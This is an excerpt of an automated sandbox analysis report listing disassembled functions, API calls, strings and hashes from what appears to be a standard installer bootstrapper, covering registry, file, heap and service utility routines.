API String ID: 1825529933-3891707333
Opcode ID: b33c3fc8d08e58a456794b16776b81ba82d435bfe0d23c407eaeb5977ebb3305
Instruction ID: 4d38dff62e4413547275acd1cbc1bcb8f66b70bf0fffbc1cc15b281eef40cc04
Opcode Fuzzy Hash: b33c3fc8d08e58a456794b16776b81ba82d435bfe0d23c407eaeb5977ebb3305
Instruction Fuzzy Hash: 5E31C572D00119ABCF22AAD4CD46FDE7768AF84720F104611FA20A7191E731DA55DBA1

Function 009D7A10 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

SysFreeString.OLEAUT32(00000000), ref: 009D7AF4
SysFreeString.OLEAUT32(?), ref: 009D7AFF
SysFreeString.OLEAUT32(00000000), ref: 009D7B0A

Strings

`5w, xrefs: 009D7AE9
atomutil.cpp, xrefs: 009D7A3D

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: FreeString$Heap$AllocateProcess
String ID: `5w$atomutil.cpp
API String ID: 2724874077-1718187286
Opcode ID: 27a7fb78b0c97b9a7e3ed3a92baa6d5e8bdedfbfe09c4e0d4b0b382cd1c82425
Instruction ID: 6d72cb579181ea20df9a60d2c749c4f2de39b9d05516a9e675eba7ad6dc571e2
Opcode Fuzzy Hash: 27a7fb78b0c97b9a7e3ed3a92baa6d5e8bdedfbfe09c4e0d4b0b382cd1c82425
Instruction Fuzzy Hash: 4B318432D49129BBCB229BD8CC45F9EFBB8EF44750F1181A6E900AB210F7749E009B90

Function 0099F005 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,009A0654,00000001,00000001,00000001,009A0654,00000000), ref: 0099F07D
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,009A0654,00000001,00000001,00000001,009A0654,00000000,00000001,00000000,?,009A0654,00000001), ref: 0099F09A

Strings

Failed to format key for update registration., xrefs: 0099F033
Failed to remove update registration key: %ls, xrefs: 0099F0C7
PackageVersion, xrefs: 0099F05E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: a57457765fc030c02aaad286f6de9123b19f1c8db47550d5a9d51d81d0b59614
Instruction ID: cf4d1593891c1d524dd1cf7b373a8f9a6e24eaf97df2dcf68ac7b1f026a67ffc
Opcode Fuzzy Hash: a57457765fc030c02aaad286f6de9123b19f1c8db47550d5a9d51d81d0b59614
Instruction Fuzzy Hash: 35216131D41229BBDF21ABA9CD09FAEBEBCDF45720F104266F924E6251E7319A40D690

Function 009D433D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D4440: FindFirstFileW.KERNEL32(009B923A,?,00000100,00000000,00000000), ref: 009D447B
Part of subcall function 009D4440: FindClose.KERNEL32(00000000), ref: 009D4487

RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 009D4430

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

Part of subcall function 009D1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 009D123F
Part of subcall function 009D1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009A70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 009D1276

Strings

crypt32.dll, xrefs: 009D4368
\, xrefs: 009D43B9
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 009D436F
PendingFileRenameOperations, xrefs: 009D439B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: 66e67ceb60b0186041ab23f3fac71fb5b800830a5705ac035625c5e4d84e5aa7
Instruction ID: e8be4fbbd4c38ad0ced12c92a4aa93df48a98ea9981ea18b8f70e688c0369913
Opcode Fuzzy Hash: 66e67ceb60b0186041ab23f3fac71fb5b800830a5705ac035625c5e4d84e5aa7
Instruction Fuzzy Hash: 46319F31980209FBDF20AF95CD41ABEB7B9EB50750F54C17BE904A6261E7319E80CB50

Function 009D4019 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00994DBC,00000000,?,?,00000000,?,009D412D,00000000,00994DBC,00000000,00000000,?,009A85EE,?,?), ref: 009D4033
GetLastError.KERNEL32(?,009D412D,00000000,00994DBC,00000000,00000000,?,009A85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009D4041
CopyFileW.KERNEL32(00000000,00994DBC,00000000,00994DBC,00000000,?,009D412D,00000000,00994DBC,00000000,00000000,?,009A85EE,?,?,00000001), ref: 009D40AC
GetLastError.KERNEL32(?,009D412D,00000000,00994DBC,00000000,00000000,?,009A85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009D40B6

Strings

fileutil.cpp, xrefs: 009D40D5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: e1d21b9650e636c98c15fb034fb37059ccead38f80370db3ae8a50dd29f5f000
Instruction ID: 9b57fa4e2ccd746d1c346271faa45f67f1cde78e4c6968d0051388c12763fd4f
Opcode Fuzzy Hash: e1d21b9650e636c98c15fb034fb37059ccead38f80370db3ae8a50dd29f5f000
Instruction Fuzzy Hash: B521C2266C537697DB300AAACC40B3B669CEF64BA0B158537FF04DB351E7B58C8092E1

Function 0099EF1B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0099EF56

Part of subcall function 009D4153: SetFileAttributesW.KERNEL32(009B923A,00000080,00000000,009B923A,000000FF,00000000,?,?,009B923A), ref: 009D4182
Part of subcall function 009D4153: GetLastError.KERNEL32(?,?,009B923A), ref: 009D418C

Part of subcall function 00993C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0099EFA1,00000001,00000000,00000095,00000001,009A0663,00000095,00000000,swidtag,00000001), ref: 00993C88

Strings

Failed to allocate regid folder path., xrefs: 0099EFBC
swidtag, xrefs: 0099EF65
Failed to format tag folder path., xrefs: 0099EFC3
Failed to allocate regid file path., xrefs: 0099EFB5

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: 55f632002296fb4f67b6685f698151a5c0bd35c2675c978e2f63173372fc73bc
Instruction ID: 6b4f7c92c6b0a3417af3254466a1486d57ac3da9293b33c490e284b335390def
Opcode Fuzzy Hash: 55f632002296fb4f67b6685f698151a5c0bd35c2675c978e2f63173372fc73bc
Instruction Fuzzy Hash: AD217831D00518BBDF15EB9DCC41B9DFBB9EF84310F55C0A6F518A62A1D7319E40AB90

Function 009B8DB6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 009B8E3A
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0099F7E0,00000001,00000100,000001B4,00000000), ref: 009B8E88

Strings

Failed to enumerate uninstall key for related bundles., xrefs: 009B8E99
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009B8DD7
Failed to open uninstall registry key., xrefs: 009B8DFD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 8d0701fdbacf3b8dec5d451eb96aade22c052aed2b27249b1c317e74c28d7a95
Instruction ID: 878d5bd44619bcd050c671aeb25f44afcb9e886a0b78cffde0f9aec5dac248b0
Opcode Fuzzy Hash: 8d0701fdbacf3b8dec5d451eb96aade22c052aed2b27249b1c317e74c28d7a95
Instruction Fuzzy Hash: 0821D636940228FEDB12BA94CD4ABEFBB6DEB48730F244565F510661A0DB358E90D690

Function 009BD259 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

WaitForSingleObject.KERNEL32(?,000000FF), ref: 009BD2EE
ReleaseMutex.KERNEL32(?), ref: 009BD31C
SetEvent.KERNEL32(?), ref: 009BD325

Strings

Failed to allocate buffer., xrefs: 009BD29D
NetFxChainer.cpp, xrefs: 009BD293

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 84fbc2210cf475f5a66e675edbbb54a2571c56685dd24500a99cc47a02f71594
Instruction ID: 44c76d1b3b59ff5fed68757fad837cf302c5d45e8070a545ef706c09c5213f5f
Opcode Fuzzy Hash: 84fbc2210cf475f5a66e675edbbb54a2571c56685dd24500a99cc47a02f71594
Instruction Fuzzy Hash: C221E57160130AFFDB109F68C844AA9B7F9FF48324F108629FA64A7352D771A950CB90

Function 009D5907 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,009B6B11,00000000,?), ref: 009D591D
GetLastError.KERNEL32(?,?,009B6B11,00000000,?,?,?,?,?,?,?,?,?,009B6F28,?,?), ref: 009D592B

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,009B6B11,00000000,?), ref: 009D5965
GetLastError.KERNEL32(?,?,009B6B11,00000000,?,?,?,?,?,?,?,?,?,009B6F28,?,?), ref: 009D596F

Strings

svcutil.cpp, xrefs: 009D594E, 009D5990

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: a08b1fcb331b9b1d859c8d6e2c7756bc5ccf451ca0e74455c3fd30f62841a727
Instruction ID: 766731ee217456059103c742d74a56cfac0bf423809069a7d9c1ab0937a92d53
Opcode Fuzzy Hash: a08b1fcb331b9b1d859c8d6e2c7756bc5ccf451ca0e74455c3fd30f62841a727
Instruction Fuzzy Hash: C721D1369D2A39E7DB215A958D14BAFBE6D9B80BB0F538016BD04AB300E630CD0093E0

Function 009D3245 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 009D3258
VariantInit.OLEAUT32(?), ref: 009D3264
VariantClear.OLEAUT32(?), ref: 009D32D8
SysFreeString.OLEAUT32(00000000), ref: 009D32E3

Part of subcall function 009D3498: SysAllocString.OLEAUT32(?), ref: 009D34AD

Strings

`5w, xrefs: 009D32E3

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID: `5w
API String ID: 347726874-4151700305
Opcode ID: 91b301dd127da1bfe4f22e8cc05c82e36be52ef82348d43f43fb996a9dd11f48
Instruction ID: 32717c084bfc86272d0b2c9234dd053f6d3a37af27188c6f0677f4d4959aa552
Opcode Fuzzy Hash: 91b301dd127da1bfe4f22e8cc05c82e36be52ef82348d43f43fb996a9dd11f48
Instruction Fuzzy Hash: BD217F31D42219EFCB14DFA4C848EAEBBB9EF48712F01815AE91197320C7319E45DB91

Function 00999839 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 009998C8

Strings

Failed to parse condition '%ls' at position: %u, xrefs: 0099987A
condition.cpp, xrefs: 0099986A, 009998AB
Failed to find variable., xrefs: 009998B5
Failed to read next symbol., xrefs: 009998E4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: 184fe1afd265ccbe16b61a8320a0f7ba5f574f02a43abbee12872c34a19861d0
Instruction ID: d2e1e83a9d4f053c59f68f14e08703f482d5ad8845eba0019fdb7cdf256e12a3
Opcode Fuzzy Hash: 184fe1afd265ccbe16b61a8320a0f7ba5f574f02a43abbee12872c34a19861d0
Instruction Fuzzy Hash: C111EB321C12147BEF253DAE9C8AE963A19EF96720F04845EF9006A2D2C662C910C7E1

Function 00999E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00999E38

Strings

Failed get file version., xrefs: 00999E78
Failed to format path string., xrefs: 00999E43
File search: %ls, did not find path: %ls, xrefs: 00999EA3
Failed to set variable., xrefs: 00999E97

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 3efe05bd5a8dde0d1524c79ab626b2731fcba90d1522055abf38eff9e6b739ea
Instruction ID: c5abd2dd353d822a79fef19a59d654c32c8d8e6bf44efd13fd74b23bc7fd98bd
Opcode Fuzzy Hash: 3efe05bd5a8dde0d1524c79ab626b2731fcba90d1522055abf38eff9e6b739ea
Instruction Fuzzy Hash: C9119332D8011DBBDF02AEDC8C429AEFB78EF54754F10816AF9146A210D6315E109B91

Function 009A820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,009A8E17,0000001A,00000000,?,00000000,00000000), ref: 009A8258
GetLastError.KERNEL32(?,?,009A8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 009A8262

Strings

Failed to create well known SID., xrefs: 009A8290
Failed to allocate memory for well known SID., xrefs: 009A8240
cache.cpp, xrefs: 009A8236, 009A8286

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: 7bdbefa0e9d02233cefc17c0c2c1eaf6956eef59f434f5a9e06e2d5ab495d727
Instruction ID: b1233e08ab388a833818902015c8a193e85364805e1dddb6cbefe2784427c6e6
Opcode Fuzzy Hash: 7bdbefa0e9d02233cefc17c0c2c1eaf6956eef59f434f5a9e06e2d5ab495d727
Instruction Fuzzy Hash: 0101AC33556625B7DA2155DA5C0AFAB6B5DDFC2FB0B114016FD14BB240EE748D4045E0

Function 009BDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 009BDDCE
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009BDDF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,009BDFC8,00000000,?,?,?,?,00000000), ref: 009BDE00

Strings

bitsengine.cpp, xrefs: 009BDE24
Failed while waiting for download., xrefs: 009BDE2E

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsengine.cpp
API String ID: 435350009-228655868
Opcode ID: 80603f122dd1304c01f4187aed2328ebbb22caa9d694cc820ac99d979b5d575b
Instruction ID: 7bce5b5ee4c811909eb70017a35aadb6cc974338bda92340df0d1c88aa49db5d
Opcode Fuzzy Hash: 80603f122dd1304c01f4187aed2328ebbb22caa9d694cc820ac99d979b5d575b
Instruction Fuzzy Hash: 9F112973A87235B7D7205AA99D09EEBBB5CDF44B70F010126FE04FB180E6609D0082E0

Function 00995F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 00995F5C
GetLastError.KERNEL32 ref: 00995F66

Strings

Failed to get computer name., xrefs: 00995F94
Failed to set variant value., xrefs: 00995FAD
variable.cpp, xrefs: 00995F8A

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: a976c0be41e809d3c67c4e05f301d4a4d2d95c967b3eed793e284e94e8a09cf4
Instruction ID: 47316537a9b4defbf39413edaf51c38723bd0717f1ead4be718cfed73a7cb19a
Opcode Fuzzy Hash: a976c0be41e809d3c67c4e05f301d4a4d2d95c967b3eed793e284e94e8a09cf4
Instruction Fuzzy Hash: 0D11EC33A465285BDB119A999D05BDF77E89B48730F024057FD00F7240DA749E4487E1

Function 00995E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00995EA6

Part of subcall function 009D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00995EB2,00000000), ref: 009D0AE0
Part of subcall function 009D0ACC: GetProcAddress.KERNEL32(00000000), ref: 009D0AE7
Part of subcall function 009D0ACC: GetLastError.KERNEL32(?,?,?,00995EB2,00000000), ref: 009D0AFE

Part of subcall function 009D3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 009D3D4C

Strings

Failed to get shell folder., xrefs: 00995EDA
Failed to set variant value., xrefs: 00995F0A
variable.cpp, xrefs: 00995ED0
Failed to get 64-bit folder., xrefs: 00995EF0

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: badf74c848326701220bd39735ff2f5e9d8c2e3f123b4dbbc97eec4b1bce997e
